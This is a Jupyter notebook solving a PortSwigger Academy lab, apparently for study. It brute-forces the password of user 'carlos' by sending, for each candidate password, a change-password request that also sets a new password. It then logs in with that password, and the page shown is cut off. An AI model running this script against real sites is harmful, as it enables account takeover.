# Other - Password Brute-Force via Password Change
[See lab here](https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change)

Me: `wiener:peter`\
Target: `carlos`

In [1]:
import requests
import asyncio
import aiohttp
import tqdm.notebook as tq

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

from load_un_pw import get_un_pw

In [6]:
URL = "https://acd11f521f5e2f3ac0d53bee00d3004c.web-security-academy.net/"

_, passwords = get_un_pw()

target_uname = "carlos"
new_pw = "test"

#Lets just try to submit the "change password" request over and over with carlos' username,
#iterating through all passwords

#https://acd11f521f5e2f3ac0d53bee00d3004c.web-security-academy.net/my-account/change-password

async def reset_pw(session, old_pw):
    async with session.post(
        URL + "my-account/change-password", 
        data = {"username" : target_uname, 
                "current-password" : old_pw,
                "new-password-1" : new_pw, 
                "new-password-2" : new_pw}
        ) as response:
        return [old_pw, await response.text()]
    
async def brute_force_pw_change():
    async with aiohttp.ClientSession() as session:
        tasks = [reset_pw(session, x) for x in passwords]
        
        return [await f for f in tq.tqdm(asyncio.as_completed(tasks), total=len(tasks))]
        
result = asyncio.run(brute_force_pw_change())

  0%|          | 0/100 [00:00<?, ?it/s]

In [8]:
[x[0] for x in result if "Password changed successfully!" in x[1]]

[]

Ok so the password should now be changed. Let's log in to finish the lab

In [9]:
r = requests.post(URL + "login", data = {"username" : target_uname, "password" : new_pw})
r

<Response [200]>

In [10]:
r.text

'<!DOCTYPE html>\n<html>\n    <head>\n        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>\n        <link href=/resources/css/labs.css rel=stylesheet>\n        <title>Password brute-force via password change</title>\n    </head>\n    <body>\n        <script src="/resources/labheader/js/labHeader.js"></script>\n        \n        <div id="academyLabHeader">\n            <section class="academyLabBanner">\n                <div class="container">\n                    <div class="logo"></div>\n                        <div class="title-container">\n                            <h2>Password brute-force via password change</h2>\n                            <a id=\'lab-link\' class=\'button\' href=\'/\'>Back to lab home</a>\n                            <a class="link-back" href="https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-brute-force-via-password-change">\n                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp